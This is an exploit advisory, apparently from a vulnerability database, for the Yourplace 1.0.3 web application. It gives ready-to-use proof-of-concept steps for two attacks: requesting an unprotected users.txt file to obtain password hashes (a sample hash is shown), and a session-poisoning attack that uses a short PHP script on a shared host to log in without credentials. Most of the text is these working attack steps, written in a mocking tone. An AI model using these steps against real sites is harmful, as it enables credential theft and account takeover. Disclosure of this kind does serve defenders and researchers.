Yourplace 1.0.3 Credentials Dislcosure and Session Poisoning Vulnerabilities

2012.07.24

Credit: condis

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-200

Yourplace 1.0.3 Credentials Dislcosure && Session Poisoning Vulnerabilities
by condis
04.10.2011

download : http://sourceforge.net/projects/yourplace/

1. Credentials Disclosure Vulnerability

	Proof of Concept:

		http://host.tld/user/info/users.txt

	You'll see something like:
	
		admin	$1$DG3.QA2.$6WzBBJvwvtqzUBxZcD.dC1
	
	Description:
	
		There is no .htaccess rule which could deny access to users.txt.
		Also it's pure stupidness to put sensitive data into txt files...
	
		User password is encrypted using crypt() function where password 
		is user defined password, and salt is his login.
	
2. Session Poisoning Vulnerability

	To exploit this vulnerability You must have account on server with 
	attacked application i.e.: in other domain (shared hostings)
	
	1. Visit site you want to attack.
	2. Create simple script:
	
		<?php
		
		session_start();
		$_SESSION['username'] = true;
			
		?>
	
	save it on Your account, and execute via browser.
	
	3. Refresh browser card with attacked site
	4. You're logged in ... nice and easy, lulz...

References:

http://sourceforge.net/projects/yourplace/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Yourplace 1.0.3 Credentials Dislcosure and Session Poisoning Vulnerabilities

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.